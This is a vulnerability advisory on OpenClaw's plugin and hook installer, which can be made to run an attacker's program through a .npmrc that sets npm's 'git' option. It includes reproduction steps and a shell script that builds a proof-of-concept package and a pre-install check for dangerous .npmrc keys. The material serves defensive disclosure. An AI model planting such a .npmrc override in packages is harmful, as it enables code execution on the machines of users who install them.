OpenClaw Arbitrary Code Execution Vulnerability via .npmrc in Local Plugin and Hook Installation

Vulnerability

A vulnerability allowing arbitrary code execution has been identified in OpenClaw versions prior to 2026.3.24. The issue arises during the installation of local plugins and hooks: npm reads a project-level .npmrc from the directory it installs in, and the npm `git` configuration option names the executable npm invokes for git operations. An attacker who ships a .npmrc in the plugin or hook package can set `git` to an arbitrary program. When OpenClaw runs npm install in the staged package directory, any git dependency declared in the package's package.json causes npm to run that program instead of git.

Impact

Exploitation of this vulnerability allows arbitrary code execution on the machine running OpenClaw, with the privileges of the user performing the plugin or hook installation. The attacker needs only to get the victim to install a local plugin or hook package the attacker controls; no lifecycle scripts are required, so settings that merely disable install scripts do not prevent it.

Reproduction

To reproduce this vulnerability, create a local plugin or hook package that includes a .npmrc file. In the .npmrc file, set the `git` option to the path of an executable to be run, such as calc.exe on Windows (any executable path works on other platforms). Then add a git dependency (for example a `git+https://...` specifier) to the package's package.json. When the package is installed using OpenClaw, npm reads the .npmrc, replaces the git executable path with the configured program, and runs it while resolving the git dependency.
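The following is an added example, not OpenClaw's code or a script from the advisory. It builds a package directory of the shape described above (a .npmrc that sets `git`, plus a package.json with a git dependency) without running npm, and shows the pre-install check a practitioner would want: refuse to run npm install on a staged package whose .npmrc reassigns an executable npm will invoke. The payload path, package name and dependency URL are placeholders, and the list of checked option names (`git`, `script-shell`) is an assumed starting set rather than an exhaustive one.

```shell
#!/bin/sh
# Added example (not OpenClaw's code). Builds a proof-of-concept package of the
# shape the advisory describes and checks a staged package for a .npmrc that
# overrides the executable npm runs for git operations.

# make_poc_package DIR PAYLOAD
# Writes a .npmrc setting npm's `git` option to PAYLOAD and a package.json with
# a git dependency, so that `npm install` in DIR would run PAYLOAD.
# The package name and dependency URL are placeholders (assumption).
make_poc_package() {
    dir=$1
    payload=$2
    mkdir -p "$dir"
    printf 'git=%s\n' "$payload" > "$dir/.npmrc"
    cat > "$dir/package.json" <<'EOF'
{
  "name": "poc-plugin",
  "version": "1.0.0",
  "dependencies": {
    "some-dep": "git+https://example.invalid/some/repo.git"
  }
}
EOF
}

# check_npmrc DIR
# Returns 0 if DIR has no .npmrc or its .npmrc sets nothing dangerous,
# 1 if the .npmrc assigns an npm option that names an executable npm will run.
# Checked keys: `git` (git command) and `script-shell` (shell for scripts);
# this set is an assumption, extend it for your own policy.
check_npmrc() {
    rc="$1/.npmrc"
    [ -f "$rc" ] || return 0
    # Normalise: drop CR, strip ; and # comments and blank lines, trim leading
    # space, collapse "key = value" to "key=value", then match the keys.
    if tr -d '\r' < "$rc" \
        | sed -e 's/[;#].*$//' -e '/^[[:space:]]*$/d' \
              -e 's/^[[:space:]]*//' -e 's/[[:space:]]*=[[:space:]]*/=/' \
        | grep -qiE '^(git|script-shell)='; then
        return 1
    fi
    return 0
}

# Stand-alone usage: build the PoC and show the check rejecting it.
if [ "${1:-}" = "demo" ]; then
    work=$(mktemp -d)
    make_poc_package "$work/evil-plugin" /tmp/payload
    if check_npmrc "$work/evil-plugin"; then
        echo "unexpected: staged package passed the check"
    else
        echo "refusing to npm install: $work/evil-plugin/.npmrc overrides an npm executable"
    fi
    rm -rf "$work"
fi
```

Run with `sh poc.sh demo` to build the package and see it rejected. The check is a gate for an installer, not a sandbox: it catches the project-level .npmrc described here, but npm also reads user and global config and `npm_config_*` environment variables, so a staging step that deletes .npmrc outright before install is the simpler hard guarantee.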

Remediation

Users should update to OpenClaw version 2026.3.24 or later, where this vulnerability has been patched. Until then, inspect any local plugin or hook package for a .npmrc file before installing it, and treat one that sets `git` (or any other option naming an executable) as malicious.

Added: Apr 10, 2026, 6:39 PM
Updated: Apr 10, 2026, 6:39 PM

Vulnerability Rating

Custom Algorithm

spread          0.0
impact          7.5
exploitability  5.6
remediation     0.0
relevance       5.6
threat          6.4
urgency         2.9
incentive       0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.